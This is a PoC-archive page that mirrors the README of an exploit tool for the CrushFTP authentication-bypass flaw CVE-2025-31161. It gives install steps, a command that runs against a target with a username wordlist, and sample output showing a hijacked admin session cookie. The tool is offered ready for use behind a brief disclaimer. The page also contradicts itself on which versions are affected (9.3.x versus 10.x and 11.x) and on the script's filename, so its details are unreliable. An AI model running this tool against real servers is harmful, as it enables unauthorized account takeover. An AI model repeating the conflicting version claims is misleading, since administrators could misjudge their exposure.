CVE-2025-31161 PoC — CrushFTP 安全漏洞

Source

https://github.com/TX-One/CVE-2025-31161

Associated Vulnerability

Title:CrushFTP 安全漏洞 (CVE-2025-31161)
Description:CrushFTP是CrushFTP公司的一款文件传输服务器。 CrushFTP 10.8.4之前的10.x本和11.3.1之前的11.x版本存在安全漏洞，该漏洞源于认证绕过漏洞，可能导致账户接管。

Description

CrushFTP CVE-2025-31161 Exploit Tool 🔓

Readme

# CrushFTP CVE-2025-31161 Exploit Tool 🔓
**Advanced detection and exploitation tool for CVE-2025-31161 vulnerability in vulnerable CrushFTP versions.**
-----


`CVE-2025-31161` is a critical authentication bypass vulnerability in the CrushFTP Web Interface. By manipulating the HTTP Authorization header, an unauthenticated attacker can gain full access under any valid username without supplying the correct password.

Affected Versions

CrushFTP 9.3.8

CrushFTP 9.3.9

CrushFTP 9.3.10

CrushFTP 9.3.11

CrushFTP 9.3.12

CrushFTP Enterprise versions before 9.3.12.5


## Key Features 🚀

- Automatic CrushFTP version detection and vulnerability verification
- Multi-threaded credential testing for rapid user enumeration
- Dual authentication method support (Bearer Token & Basic Auth)
- JSON report generation with session cookies
- Smart connection retry mechanisms with custom configurations
- Colorized console output with detailed logging
- Vulnerable version coverage:
  - 9.3.8 through 9.3.12.5

 ## Requirements 📋

- Python 3.8+
- Required packages:
  ```bash
  pip install requests colorama urllib3
  ```

  ## Installation 🛠️

1. Install dependencies:
  ```bash
   pip install requests colorama urllib3
   ```
2. Clone repository:
  ```bash
   git clone https://github.com/TX-One/CVE-2025-31161.git
   cd CVE-2025-31161
   python3 tx-crush.py -h
   ```

## Usage 🖥️

### Basic Command:
```
python3 CVE-2025-31161.py -t https://target:8080 -u users.txt -o results.json
```
### Options:
```
-h, --help            show this help message and exit
  -t, --target TARGET   Target URL (e.g., https://example.com:8080)
  -u, --users USERS     File containing username list
  -o, --output OUTPUT   Output JSON file
  -T, --threads THREADS
                        Number of threads (default: 5)
  --no-ssl              Disable SSL verification
  --timeout TIMEOUT     Request timeout (default: 15)
  --retries RETRIES     Number of retries (default: 3)
  --force               Bypass version check
```
### Advanced Example:
```bash
python3 exploit.py
  -t https://vulnerable-server.com:8000
  -u ./wordlists/common_users.txt
  -o ./results/compromised.json
  -T 10
  --retries 5
  --timeout 20
```

## Output Sample 📄

```json
[
  {
    "target": "https://victim:8080",
    "user": "admin",
    "success": true,
    "method": "Bearer",
    "cookies": {"sessionID": "a1b2c3..."},
    "server_version": "CrushFTP/9.3.12"
  }
]
```
```json
[
  {
        "target": "http://victim:8080",
        "user": "admin",
        "success": false
    }
]
```
**Disclaimer:** This project is for educational and security research purposes only. Responsible usage required.

File Snapshot


 [4.0K]  /data/pocs/08fb33af78e3c8ab6af7f820e93850e3fae9728b
├── [4.0K]  img
│   └── [ 32K]  crushftp_banner.png
├── [2.6K]  README.md
└── [8.8K]  tx-crush.py

1 directory, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!